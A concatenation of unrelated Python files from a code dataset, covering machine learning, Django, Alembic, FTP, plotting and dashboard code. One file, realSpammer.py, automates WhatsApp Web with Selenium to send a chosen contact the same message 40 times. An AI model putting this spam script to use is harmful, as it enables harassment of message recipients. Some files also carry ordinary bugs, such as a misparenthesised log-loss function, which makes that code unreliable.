logging.info(np.mean(t_preds))\n preds.append(t_preds)\n train_preds=[]\n\n for data in (eval_train_data_loader):\n x = data['x'].to(device)\n with torch.no_grad():\n outputs = model(x)\n train_preds.extend(list(outputs.sigmoid().cpu().detach().numpy()))\n train_loss = Metric(eval_train_Y, train_preds)\n eval_train_loss += train_loss\n logging.info('eval_train_loss:', train_loss)\n\n sub[targets] = np.array(preds).mean(axis=0)\n return oof, sub\n\ndef Seed_everything(seed=42):\n random.seed(seed)\n os.environ['PYTHONHASHSEED'] = str(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n torch.backends.cudnn.deterministic = True\n\ndef Metric(labels, preds):\n labels = np.array(labels)\n preds = np.array(preds)\n metric = 0\n for i in range(labels.shape[1]):\n metric += (-np.mean(labels[:, i]*np.log(np.maximum(preds[:, i], 1e-15))+(1-labels[:, i])*np.log(np.maximum(1-preds[:, i], 1e-15))))\n return metric/labels.shape[1]\n\nargs = argparse.ArgumentParser()\nargs.add_argument('--input_dir', default='./data/from_kaggle', help='input data path of dataset')\nargs.add_argument('--model_dir', default='./experiments/base_model', help='model path to params.json')\n\n## MAIN -------------------------------------------------------\n\nSeed_everything(seed=42)\n\nargs = args.parse_args()\n\n# load parameters \njson_path = os.path.join(args.model_dir, 'params.json') \nassert os.path.isfile(json_path), \"No json file found at {}\".format(json_path)\nparams = utils.Params(json_path)\n\n# set log info\nutils.set_logger(os.path.join(args.model_dir, 'shiji_submission1.log'))\n\n# Set parameters \ndevice = ('cuda' if torch.cuda.is_available() else 'cpu')\nncompo_genes = params.ncompo_genes #80\nncompo_cells = params.ncompo_cells #10\n\nEPOCHS = params.num_epochs # 29 \nSEEDS = params.num_seeds # 3\nLEARNING = 1/90.0/3.5*7\nDECAY = 1e-5/9.5\nFOLDS = 5\nAUGMENT = params.augmentation\n\n\ntrn_loss_ = []\n \nfiles = ['%s/test_features.csv'%args.input_dir, \n '%s/train_targets_scored.csv'%args.input_dir, \n '%s/train_features.csv'%args.input_dir, \n '%s/train_targets_nonscored.csv'%args.input_dir, \n '%s/train_drug.csv'%args.input_dir, \n '%s/sample_submission.csv'%args.input_dir]\n\ntest = pd.read_csv(files[0])\ntrain_target = pd.read_csv(files[1])\ntrain = pd.read_csv(files[2])\ntrain_nonscored = pd.read_csv(files[3])\ntrain_drug = pd.read_csv(files[4])\nsub = pd.read_csv(files[5])\n\ngenes = [col for col in train.columns if col.startswith(\"g-\")]\ncells = [col for col in train.columns if col.startswith(\"c-\")]\n\nfeatures = genes + cells\ntargets = [col for col in train_target if col!='sig_id']\ntargets_ns=[col for col in train_nonscored if col!='sig_id']\n\ntrain_target = pd.merge(train_target, train_nonscored, on='sig_id')\n\nori_train = train.copy()\nctl_train = train.loc[train['cp_type']=='ctl_vehicle'].append(test.loc[test['cp_type']=='ctl_vehicle']).reset_index(drop=True)\nctl_train2 = train.loc[train['cp_type']=='ctl_vehicle'].reset_index(drop=True)\n\nori_test = test.copy()\nctl_test = test.loc[test['cp_type']=='ctl_vehicle'].reset_index(drop=True)\n\ntt = train.append(test).reset_index(drop=True)\ntt, transformers, gene_pca, cell_pca = Feature(tt)\ntrain = tt[:train.shape[0]]\ntest = tt[train.shape[0]:].reset_index(drop=True)\n\nif 1:\n train_target = train_target.loc[train['cp_type']!='ctl_vehicle'].reset_index(drop=True)\n train_nonscored = train_nonscored.loc[train['cp_type']!='ctl_vehicle'].reset_index(drop=True)\n train_drug = 
train_drug.loc[train['cp_type']!='ctl_vehicle'].reset_index(drop=True)\n ori_train = ori_train.loc[train['cp_type']!='ctl_vehicle'].reset_index(drop=True)\n train = train.loc[train['cp_type']!='ctl_vehicle'].reset_index(drop=True)\n\ntrain_cols = [col for col in train.columns if col not in ['sig_id', 'cp_type']]\n\nSeed_everything(0)\noof, sub = train_and_predict(features = train_cols\n , sub = sub.copy()\n , aug = AUGMENT\n , folds = FOLDS\n , seed = 0\n , lr = LEARNING\n , weight_decay = DECAY)\n\noutputs = []\nfor seed in range(SEEDS):\n Seed_everything(seed)\n outputs.append(train_and_predict(features = train_cols\n , sub = sub.copy()\n , aug = AUGMENT\n , folds = FOLDS\n , seed = seed\n , lr = LEARNING\n , weight_decay = DECAY))\n\n# correlation coefficient oof vs. output\nfor output in outputs:\n logging.info('oof corr:', np.corrcoef(oof[targets].values.reshape(-1)\n , output[0][targets].values.reshape(-1))[0][1])\n logging.info('sub corr:', np.corrcoef(sub[targets].values.reshape(-1)\n , output[1][targets].values.reshape(-1))[0][1])\n\n# Average over seeds\nfor output in outputs:\n oof[targets] += output[0][targets]\n sub[targets] += output[1][targets]\noof[targets] /= (1+len(outputs))\nsub[targets] /= (1+len(outputs))\n\n# Valid logloss\nvalid_metric = Metric(train_target[targets].values, oof[targets].values)\nlogging.info('oof mean:%.6f, sub mean:%.6f, valid metric:%.6f'%(oof[targets].mean().mean(), sub[targets].mean().mean(), valid_metric))\n\n# Save output \nsub.loc[test['cp_type']=='ctl_vehicle', targets] = 0.0\nsub.to_csv(os.path.join(args.model_dir, 'shiji_submission1.csv'), index = False)\noof.to_csv(os.path.join(args.model_dir, 'shiji_submission1_oof.csv'), index = False)\n\n","sub_path":"shiji_solution1.py","file_name":"shiji_solution1.py","file_ext":"py","file_size_in_byte":17535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"296888386","text":"from django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin\nfrom django.shortcuts import get_object_or_404, render, redirect\nfrom django.views.generic import CreateView, UpdateView, DeleteView\n\nfrom .models import Movie, MovieCrew, MovieComment, MovieRate\nfrom .forms import MovieCommentForm, MovieRateForm\n\n\ndef movies_list(request):\n movie_list = Movie.objects.all().order_by('-release_date')[:10]\n context = {\n 'm_list': movie_list,\n\n }\n return render(request, 'movies/home.html', context)\n\n\ndef movies_detail(request, movie_id, comment_form=None, rate_form=None):\n movie = get_object_or_404(Movie, pk=movie_id)\n if comment_form is None:\n comment_form = MovieCommentForm()\n if rate_form is None:\n rate_form = MovieRateForm()\n context = {\n 'movie': movie,\n 'mc_list': MovieCrew.objects.select_related('crew', 'role').filter(movie=movie),\n 'dir': MovieCrew.objects.select_related('crew', 'role').filter(movie=movie),\n\n 'comment_list': MovieComment.objects.select_related('user').filter(\n movie=movie,\n status=MovieComment.APPROVED\n ).order_by('-created_time'),\n 'rate_form': rate_form,\n 'comment_form': comment_form,\n }\n return render(request, 'movies/detail.Html', context)\n\n\n@login_required()\ndef movies_comment(request, movie_id):\n movie = get_object_or_404(Movie, pk=movie_id)\n mcf = MovieCommentForm(request.POST)\n if not mcf.is_valid():\n return movies_detail(request, movie_id, comment_form=mcf)\n obj = MovieComment()\n obj.movie = movie\n obj.user = request.user\n 
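    # Persist the validated comment; movies_detail above only lists comments
    # whose status is MovieComment.APPROVED.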
obj.comment_text = mcf.cleaned_data.get('comment_text')\n obj.save()\n\n return redirect('movie-detail', movie_id=movie_id)\n\n\n@login_required()\ndef movies_rating(request, movie_id):\n movie = get_object_or_404(Movie, pk=movie_id)\n mrf = MovieRateForm(request.POST)\n if not mrf.is_valid():\n return movies_detail(request, movie_id, rate_form=mrf)\n obj = MovieRate()\n obj.movie = movie\n obj.user = request.user\n obj.point = mrf.cleaned_data.get('rate')\n obj.save()\n return redirect('movie-detail', movie_id=movie_id)\n\n\nclass MovieCreateView(LoginRequiredMixin, CreateView):\n model = Movie\n fields = ['title', 'release_date', 'genre', 'picture']\n\n def form_valid(self, form):\n form.instance.user = self.request.user\n return super().form_valid(form)\n\nclass MovieUpdateView(LoginRequiredMixin, UserPassesTestMixin, UpdateView):\n model = Movie\n fields = ['title', 'release_date', 'genre', 'picture']\n success_url = '/movies/'\n\n def form_valid(self, form):\n form.instance.user = self.request.user\n return super().form_valid(form)\n\n def test_func(self):\n movie = self.get_object()\n if self.request.user == movie.user:\n return True\n return False\n\n\nclass MovieDeleteView(LoginRequiredMixin, UserPassesTestMixin, DeleteView):\n model = Movie\n success_url = '/movies/'\n\n def test_func(self):\n movie = self.get_object()\n if self.request.user == movie.user:\n return True\n return False\n","sub_path":"movies/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"419380610","text":"\"\"\"empty message\n\nRevision ID: 45f751bd46a8\nRevises: 7c96393a9a7c\nCreate Date: 2018-06-01 08:20:21.706536\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '45f751bd46a8'\ndown_revision = '7c96393a9a7c'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_unique_constraint('aliment_group_unique', 'aliment_group', ['aliment_id', 'group_id'])\n op.drop_constraint('aliment_group_', 'aliment_group', type_='unique')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.create_unique_constraint('aliment_group_', 'aliment_group', ['aliment_id', 'group_id'])\n op.drop_constraint('aliment_group_unique', 'aliment_group', type_='unique')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/45f751bd46a8_.py","file_name":"45f751bd46a8_.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"270730583","text":"from selenium import webdriver\n\ndriver = webdriver.Chrome('C:\\\\chromedriver.exe')\ndriver.get(\"https://web.whatsapp.com\")\ndriver.implicitly_wait(15)\ndriver.find_element_by_css_selector(\"span[title='\" + input(\"Enter name to spam: \") + \"']\").click()\ninputString = input(\"Enter message to send: \")\ncount = 40\nwhile(count>0):\n count-=1\n driver.find_element_by_xpath('//*[@id=\"main\"]/footer/div[1]/div[2]/div/div[2]').send_keys(inputString)\n driver.find_element_by_xpath('//*[@id=\"main\"]/footer/div[1]/div[3]/button').click()\n\n\n","sub_path":"realSpammer.py","file_name":"realSpammer.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"574748551","text":"hour_counts = dict()\nhour_list = list()\nwhile True:\n file_name = input('Enter a file name:')\n try:\n file_handle = open(file_name)\n break\n except:\n print('No such file')\nfor line in file_handle:\n if line.startswith('From '):\n line = line.strip()\n words = line.split()\n words = words[5].split(':')\n hour_counts[words[0]] = hour_counts.get(words[0], 0) + 1\nhour_list = list(hour_counts.items())\nhour_list.sort()\nfor hour, count in hour_list:\n print(hour, count)\n","sub_path":"ex_10_02.py","file_name":"ex_10_02.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"570681080","text":"# Short script to utilize the murlin trebuchet class to create the time interval graphic.\n\n# Written by Graham Bell 6th December 2016.\n\nimport numpy as np\nfrom optimizeAllTrebs import simpleMurlinDict\nimport matplotlib.pyplot as plt\nimport latexPlotTools as lpt\n\n# Perform the throw at m1 = 50\ntrebDict = simpleMurlinDict\n# Create instance of the trebuchet.\ntreb = trebDict['TrebClass']()\n\nzinit = trebDict['zinit']\n\nm1 = 50.0\na = 1.22\nL2 = 4.0\nL3 = 4.0\nrange, throwAngle = treb.runTreb(L2=L2, L3=L3, a=a, m1=m1, endtime=2.0, zinit=zinit, theta0=np.pi/4)\n# Throw step index\nmaxThrowIndex = treb.maxThrowIndex\nprint('range', range, 'throw Angle', throwAngle, 'maxThrowIndex', maxThrowIndex)\nfig = plt.figure(figsize=(10, 6), dpi=80)\nplt.subplot(1, 1, 1, aspect='equal')\n\nbounds = 6\nxlimits = plt.xlim(-bounds, bounds)\nylimits = plt.ylim(-bounds, bounds)\nax = plt.axes(xlim=xlimits, ylim=ylimits, aspect='equal')\n\nfig, ax = lpt.newfig(0.8) #plt.subplots()\nframeInterval = 5\nfor frame in np.arange(0, maxThrowIndex, step=frameInterval):\n ax = treb.plotTreb(ax, i=int(frame), projRadius=0.2, CWRadius=0.2, lineThickness=1.0, beamCentreRadius=0.1,\n imageAlpha=0.2)\n# Plot the throw freeze point\nax = treb.plotTreb(ax, i=maxThrowIndex, projRadius=0.2, CWRadius=0.2, lineThickness=1.0, beamCentreRadius=0.1)\n\nax.set_xlim(-10, 6)\nax.set_ylim(-8, 8)\nax.set_aspect('equal')\nax.set_xlabel(r'$x$(m)')\nax.set_ylabel(r'$y$(m)')\nplotName = 'murlinTimeInterval'\nplt.tight_layout()\nlpt.savefig(plotName)\n#fig.savefig('./murlinTimeInterval.png', 
dpi=500)\n","sub_path":"murlinTimeIntevalGraphic.py","file_name":"murlinTimeIntevalGraphic.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"439632229","text":"# Third Party\nimport torch.nn as nn\n\n\n############\n# COMPONENTS\n############\n\n\nclass Encoder(nn.Module):\n def __init__(self, input_dim, hidden_dim):\n super(Encoder, self).__init__()\n\n self.linear1 = nn.Linear(input_dim, 20)\n self.linear2 = nn.Linear(20, hidden_dim)\n\n self.hidden_activ = nn.Sigmoid()\n self.output_activ = nn.Tanh()\n\n def forward(self, x):\n x = self.hidden_activ(self.linear1(x))\n x = self.output_activ(self.linear2(x))\n\n return x\n\n\nclass Decoder(nn.Module):\n def __init__(self, hidden_dim, input_dim):\n super(Decoder, self).__init__()\n\n self.linear1 = nn.Linear(hidden_dim, 20)\n self.linear2 = nn.Linear(20, input_dim)\n\n self.hidden_activ = nn.Sigmoid()\n\n def forward(self, x):\n x = self.hidden_activ(self.linear1(x))\n x = self.linear2(x)\n\n return x\n\n\n#########\n# EXPORTS\n#########\n\n\nclass SAE(nn.Module):\n def __init__(self, input_dim, hidden_dim):\n super(SAE, self).__init__()\n\n self.encoder = Encoder(input_dim, hidden_dim)\n self.decoder = Decoder(hidden_dim, input_dim)\n\n def forward(self, x):\n x = self.encoder(x)\n x = self.decoder(x)\n\n return x\n","sub_path":"sequitur/autoencoders/sae.py","file_name":"sae.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"576275871","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2020/4/1 16:55\n# @Author : evaseemefly\n# @Desc : ftp工具类,用来根据传入的 file 类型,获取匹配的 file names\n# @Site : \n# @File : ftp.py\n# @Software: PyCharm\nimport os\nfrom ftplib import FTP, FTP_TLS\nfrom ftplib import error_perm\nimport socket\nfrom fnmatch import fnmatch, fnmatchcase\n\nfrom typing import List\n\n# 当前项目\nfrom core.file import ICoverageFile, IFileBase\nfrom core.db import DbFile\nfrom util.tools import check_path_exist, exe_run_time\nfrom conf.settings import _MYSQL\n\n# 日志\nfrom common.exceptionLog import exception\nfrom common.log import logger\n\n\nclass FtpFactory:\n def __init__(self, host, user, pwd, port=21):\n self.host = host\n self.user = user\n self.pwd = pwd\n self.port = port\n self.ftp: FTP = None\n\n def init_ftp(self):\n '''\n 初始化ftp\n :return:\n '''\n if self.ftp is None:\n self.ftp = FTP()\n if all([self.host, self.user, self.pwd]):\n # 参考\n try:\n self.ftp.set_debuglevel(0)\n self.ftp.connect(self.host, self.port)\n self.ftp.login(self.user, self.pwd)\n print(self.ftp.getwelcome())\n # msg=self.ftp.retrlines('LIST xb*')\n except(socket.error, socket.gaierror):\n print(f\"连接错误:{self.host, self.port}\")\n self.ftp = None\n except error_perm:\n # 认证错误\n print(\"认证错误,请检查用户名及密码\")\n self.ftp = None\n except Exception as e:\n print(f\"其他未知错误{e}\")\n self.ftp = None\n\n def get_all_list(self) -> List[str]:\n '''\n 获取当前路径下的全部文件\n :return:\n '''\n return self.ftp.nlst()\n\n def _get_match_list(self, file: IFileBase) -> List[str]:\n list_all_names = self.get_all_list()\n list_match_names = [name for name in list_all_names if fnmatch(name, file.get_re)]\n return list_match_names\n\n def _download_file(self, file_name: str, local_path: str):\n '''\n 将ftp目录下的指定文件下载至本地的指定目录下\n :param remote_path:\n :param local_path:\n :return:\n '''\n cache_size = 1024\n\n # 将此方法统一放在common.tools中\n check_path_exist(local_path)\n 
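        # The target directory is guaranteed above; now stream the remote file
        # with a binary RETR and check the server's 226 "transfer complete" reply.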
print(f\"开始下载{file_name}....\")\n fp = open(os.path.join(local_path, file_name), 'wb')\n # 读取指定文件并写入本地文件\n # 错误1:ftplib.error_perm: 500 Syntax error, command unrecognized.\n msg = self.ftp.retrbinary('RETR ' + file_name, fp.write, cache_size)\n # 判断ftp返回的状态\n if msg.find('226') != -1:\n print(f\"{file_name}下载完毕,存储至:{os.path.join(local_path, file_name)}\")\n self.ftp.set_debuglevel(0)\n fp.close()\n\n # @exe_run_time()\n @exception(logger)\n def batch_download(self, file: IFileBase):\n '''\n 批量下载\n 由于定时任务执行时是找到日期去下载当日的全部 栅格 数据,所以只需根据传入的 栅格 file 实现类获取其中的关键信息即可\n @param file:\n @return:\n '''\n if self.ftp is None:\n self.init_ftp()\n if isinstance(file, IFileBase):\n # if file in isinstance(IFileBase):\n # 1 获取正则匹配的 files names\n list_match: List[str] = self._get_match_list(file)\n for file_temp_name in list_match:\n self.download(file_temp_name, file.save_path)\n\n # @exe_run_time()\n def download(self, file_name: str, target_dir: str):\n '''\n 下载单一的文件\n @param file_name: 文件名称\n @param target_dir:下载到的路径\n @return:\n '''\n # 2 执行下载操作,并进行分类存储\n self._download_file(file_name, target_dir)\n # 3 TODO:[*] 20-04-04 下载结束后写入数据库+日志记录 (by cwb)\n db_file = DbFile(_MYSQL.get('HOST'), _MYSQL.get('DB_NAME'), _MYSQL.get('USER'), _MYSQL.get('PASSWORD'))\n db_file.record_state(file_name, target_dir)\n # 4 需要执行标准化操作(by yyq)\n # 5 TODO:[*] 20-04-04 将标准化后的文件信息 写入数据库+日志记录 (by cwb)\n","sub_path":"background/06byDelayTask/proj/core/ftp.py","file_name":"ftp.py","file_ext":"py","file_size_in_byte":4564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"420951739","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri May 29 15:34:21 2021\r\n\r\n@author: Dhaval Panchal\r\n\"\"\"\r\n\r\nimport dash\r\nimport dash_html_components as html\r\nimport dash_core_components as dcc\r\nfrom dash.dependencies import Output, Input, State\r\nimport plotly.express as px \r\nimport plotly.graph_objects as go\r\nimport pandas as pd\r\n\r\ndf = pd.read_csv(r\"C:\\Users\\dhaval.panchal\\Pictures\\cars_categorization\\Training_CSV_File/Training_Data.csv\",encoding= 'unicode_escape')\r\n\r\ndf.columns = [column.replace(\" \", \"_\") for column in df.columns]\r\n\r\ndf.query(\"climate_control == True\", inplace = True)\r\nclimate_control = df[\"car_model\"]\r\n\r\ndf.query(\"roof == True\", inplace = True)\r\nsunroof = df[\"car_model\"]\r\n\r\ndf.query(\"petrol == True\", inplace = True)\r\npetrol = df[\"car_model\"]\r\n\r\ndf.query(\"cng == True\", inplace = True)\r\ncng = df[\"car_model\"]\r\n\r\ndf.query(\"diesel == True\", inplace = True)\r\ndiesel = df[\"car_model\"]\r\n\r\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets)\r\napp.layout = html.Div([\r\n dcc.Dropdown(\r\n id='demo-dropdown',\r\n options=[\r\n {'label': 'petrol', 'value': '{}'.format(petrol)},\r\n {'label': 'cng', 'value': '{}'.format(cng)},\r\n {'label': 'diesel', 'value': '{}'.format(diesel)},\r\n {'label': 'sunroof', 'value': '{}'.format(sunroof)},\r\n {'label': 'climate_control', 'value': '{}'.format(climate_control)}\r\n ],\r\n value='{}'.format(petrol)\r\n ),\r\n html.Div(id='dd-output-container')\r\n])\r\n\r\n@app.callback(\r\n dash.dependencies.Output('dd-output-container', 'children'),\r\n [dash.dependencies.Input('demo-dropdown', 'value')])\r\ndef update_output(value):\r\n return 'You have selected \"{}\"'.format(value)\r\n\r\nif __name__ == '__main__':\r\n app.run_server(host='172.28.11.251',port='49766',debug=True, use_reloader=False) 
\r\n","sub_path":"Dashaboard_Code.py","file_name":"Dashaboard_Code.py","file_ext":"py","file_size_in_byte":1837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"135469664","text":"import pdb\nfrom collections import defaultdict\n# given a sorted array, can you extract unique elements from the array?\n\n# amortized O(n) complexity\ndef unique(a):\n r = [a[0]]\n for n in a:\n if n != r[-1]:\n r.append(n) # amortized O(1) operation\n return r\n\n# using hash table\ndef unique2(a):\n d = defaultdict(int)\n for i in a:\n d[i] += 1\n return d.keys()\n\nif __name__=='__main__':\n print(unique([1,1,3,3,3,5,5,5,9,9,9,9]))\n print(unique2([1,1,3,3,3,5,5,5,9,9,9,9]))\n \n\n","sub_path":"unique.py","file_name":"unique.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"320336536","text":"from components.winch import Winch\nfrom magicbot import StateMachine, state, timed_state\nfrom networktables import NetworkTable\n \n\nclass WinchAutomation(StateMachine):\n winch = Winch\n sd = NetworkTable\n\n @state(first=True)\n def retract_piston(self):\n self.sd.putString(\"state\", \"climbing\")\n self.winch.rope_lock_solenoid_reverse()\n self.next_state(\"on_motor\")\n\n @timed_state(duration=2, must_finish=True, next_state=\"rotate_winch\")\n def on_motor(self):\n self.winch.rotate_winch(0.3)\n\n @state(must_finish=True)\n def rotate_winch(self):\n if self.winch.on_rope_engaged():\n self.next_state(\"fire_piston\")\n\n @state(must_finish=True)\n def fire_piston(self):\n self.winch.rope_lock_solenoid_forward()\n self.winch.rotate_winch(0.8)\n self.next_state(\"on_motor_full\")\n\n @timed_state(duration=2, must_finish=True, next_state=\"touchpad_pressed\")\n def on_motor_full(self):\n pass\n\n @state(must_finish=True)\n def touchpad_pressed(self):\n if self.winch.on_touchpad_engaged():\n self.next_state(\"stop_motor\")\n\n @state(must_finish=True)\n def stop_motor(self):\n self.winch.rotate_winch(0)\n self.sd.putString(\"state\", \"stationary\")\n self.done()\n","sub_path":"automations/winchautomation.py","file_name":"winchautomation.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"580900633","text":"from sqlalchemy import create_engine\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker\nfrom server import server_config\n\nsettings = server_config.get_settings()\n\nengine = create_engine(\n settings.database_url, connect_args={\"check_same_thread\": False}\n)\nSessionLocal = sessionmaker(autocommit=False, autoflush=False, bind=engine)\nBase = declarative_base()\n\n\n\ndef get_db():\n db = SessionLocal()\n try:\n yield db\n finally:\n db.close()\n","sub_path":"database/db_config.py","file_name":"db_config.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"284019861","text":"'''\nAuthor: Paul\nCreated on: Nov 29, 2013\n\n'''\n\nimport time\nimport cProfile\n\ndef main():\n maximum=0\n maxval=0\n for i in range(1,100000,2):\n rec=recurringPartLength(i)\n print(i,rec)\n if(rec>maximum):\n maximum=rec\n maxval=i\n print(maxval,max)\n \n \n \n \n \n\n\ndef recurringPartLength(number):\n if(number%2==0 or number%5==0):\n return 0\n else:\n i=1\n while(1):\n if(int('9'*i)%number==0):\n break\n i+=1\n return 
i\n\n\nstart=float(time.time())\ncProfile.run('main()')\nprint(time.time()-start)","sub_path":"Problems/Problem26.py","file_name":"Problem26.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"395870091","text":"#!/usr/bin/env python3\n# encoding: utf-8\n\n'''\nDefine a logging object which will be quoted by other files\nCreated on Sep 01, 2021\n@author: Guangli.bao\n'''\nimport logging\n\nlogging.basicConfig(level=logging.INFO,\n format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s',\n datefmt='%a, %d %b %Y %H:%M:%S',\n filename='auto_orthogonal_array.log',\n filemode='w')\nlogger = logging.getLogger('')\nconsole = logging.StreamHandler()\nconsole.setLevel(logging.INFO)\nformatter = logging.Formatter('%(name)-12s: %(levelname)-8s %(message)s')\nconsole.setFormatter(formatter)\n","sub_path":"auto_testcase_generator/auto_orthogonal_arrays_testcase_generator/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"105455594","text":"#!/usr/bin/python\n# encoding: utf-8\n\n# @file: __init__.py.py\n# @time: 2018/4/2 0:49\n# @author: FunnyWu\n# @contact: agiot1026@163.com\n# @Software: PyCharm\nimport os\nimport logging\nimport logging.handlers\n\nfrom flask import Flask\nfrom flask_login import LoginManager\n\nfrom .models import db, User\n\nlogin_manager = LoginManager()\n\n\ndef create_app():\n app = Flask(__name__)\n app.config.from_object('app.secure')\n app.config.from_object('app.setting')\n\n login_manager.init_app(app)\n login_manager.login_view = 'web.login'\n login_manager.login_message = '请先登录或注册'\n\n # 注册日志配置\n add_logger(app)\n\n # 初始化蓝图\n register_buleprint(app)\n # register_api(app)\n\n # 绑定数据库\n db.init_app(app)\n\n # 下面两种方法都可以创建数据库\n # with app.app_context():\n # db.create_all()\n db.create_all(app=app)\n\n return app\n\n\ndef add_logger(app):\n app.logger.setLevel(logging.INFO)\n info_log = os.path.join(app.root_path, '../', './logs', 'app-info.log')\n\n info_file_handler = logging.handlers.RotatingFileHandler(\n info_log, maxBytes=1048576, backupCount=20)\n info_file_handler.setLevel(logging.INFO)\n info_file_handler.setFormatter(\n logging.Formatter('%(asctime)s %(levelname)s: %(message)s '\n '[in %(pathname)s:%(lineno)d]')\n )\n app.logger.addHandler(info_file_handler)\n\n\n@login_manager.user_loader\ndef get_user(uid):\n return User.query.get((int(uid)))\n\n\ndef register_api(app):\n from .api import api\n api.init_app(app)\n\n\ndef register_buleprint(app):\n from .web import web\n from .api import api\n app.register_blueprint(web)\n app.register_blueprint(api)\n","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"130606087","text":"\nMAX = 10\nMIN = 1\n\ndef readPosition():\n pos = int(input(\"Input a position between \" + str(MIN) + \" and \" + str(MAX) + \": \"))\n return pos\n\ndef displayMenu():\n print(\"l - for moving left\")\n print(\"r - for moving right\")\n print(\"Any other letter for quitting\")\n\ndef readChoice():\n choice = input(\"Input your choice: \")\n return choice\n\ndef newPosition(pos, choice):\n if choice == 'l':\n if pos > MIN:\n pos -= 1\n elif choice == 'r':\n if pos < MAX:\n pos += 1\n return pos\n\n# The main program starts here\nchoice = 'l'\npos = 
readPosition()\n\nwhile choice == 'l' or choice == 'r':\n displayMenu()\n choice = readChoice()\n pos = newPosition(pos, choice)\n print(\"New position is:\", pos)","sub_path":"Lokapróf/Jolaprof_prof/asdf.py","file_name":"asdf.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"649157946","text":"import os\r\nimport logging\r\nimport subprocess\r\n\r\nimport shared.modulebase\r\n\r\n\r\nclass Game(shared.modulebase.ModuleBase):\r\n\r\n def preferred_load_index(self) -> int:\r\n return 4\r\n\r\n def run_and_wait(self):\r\n eso_path = self.app.config.get('game.path')\r\n eso_exe = self.app.config.get('game.exe')\r\n command = [os.path.join(eso_path, eso_exe)]\r\n os.chdir(eso_path)\r\n process = subprocess.Popen(command)\r\n process.wait()\r\n\r\n def run_and_do_not_wait(self):\r\n eso_path = self.app.config.get('game.path')\r\n eso_exe = self.app.config.get('game.exe')\r\n logging.info('chdir to \\'{}\\''.format(eso_path))\r\n os.chdir(eso_path)\r\n logging.info('startfile \\'{}\\''.format(eso_exe))\r\n os.startfile(os.path.join(eso_path, eso_exe))\r\n","sub_path":"modules/Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"35292124","text":"import Config\nimport math\n\nimport numpy as np\nfrom sklearn.base import TransformerMixin\n\n\nclass FFTAligner(TransformerMixin):\n def __init__(self):\n self.best_offset_ = None\n self.best_score_ = None\n self.get_score_ = False\n\n def fit(self, substring, vid_str, get_score=False):\n substring, vid_str = [\n list(map(int, s))\n if isinstance(s, str) else s\n for s in [substring, vid_str]\n ]\n substring, vid_str = map(lambda s: 2 * np.array(s).astype(float) - 1, [substring, vid_str])\n total_bits = math.log(len(substring) + len(vid_str), 2)\n total_length = int(2 ** math.ceil(total_bits))\n extra_zeros = total_length - len(substring) - len(vid_str)\n sub_fft = np.fft.fft(np.append(np.zeros(extra_zeros + len(vid_str)), substring))\n vid_fft = np.fft.fft(np.flip(np.append(vid_str, np.zeros(len(substring) + extra_zeros)), 0))\n convolve = np.real(np.fft.ifft(sub_fft * vid_fft))\n best_idx = np.argmax(convolve)\n self.best_offset_ = len(convolve) - 1 - best_idx - len(substring)\n self.best_score_ = convolve[best_idx]\n self.get_score_ = get_score\n return self\n\n def transform(self, *_):\n if self.get_score_:\n return self.best_score_, self.best_offset_\n else:\n return self.best_offset_\n\n\nif __name__ == '__main__' and Config.DEBUG is True:\n back = FFTAligner().fit_transform(\"111001\", \"11001\")\n print(back)\n if back == -1:\n print(\"Success\")\n else:\n 